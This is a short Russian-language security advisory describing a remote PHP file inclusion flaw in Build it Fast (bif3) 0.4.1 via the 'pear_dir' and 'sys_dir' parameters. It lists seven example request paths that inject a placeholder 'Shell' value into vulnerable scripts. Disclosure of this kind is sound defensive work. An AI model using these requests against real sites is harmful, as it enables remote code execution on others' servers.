Программа: Build it Fast (bif3) 0.4.1
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «pear_dir» сценарием Application.php и в параметре «sys_dir» множественными сценариями. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Успешное эксплуатирование уязвимости требует включение опции "register_globals" в конфигурационном файле PHP.
Пример:
[Path]/Base/Application.php?pear_dir=Shell
[Path]/Widgets/Base/Footer.php?sys_dir=Shell
[Path]/Widgets/Base/widget.BifContainer.php?sys_dir=Shell
[Path]/Widgets/Base/widget.BifRoot.php?sys_dir=Shell
[Path]/Widgets/Base/widget.BifRoot2.php?sys_dir=Shell
[Path]/Widgets/Base/widget.BifRoot3.php?sys_dir=Shell
[Path]/Widgets/Base/widget.BifWarning.php?sys_dir=Shell
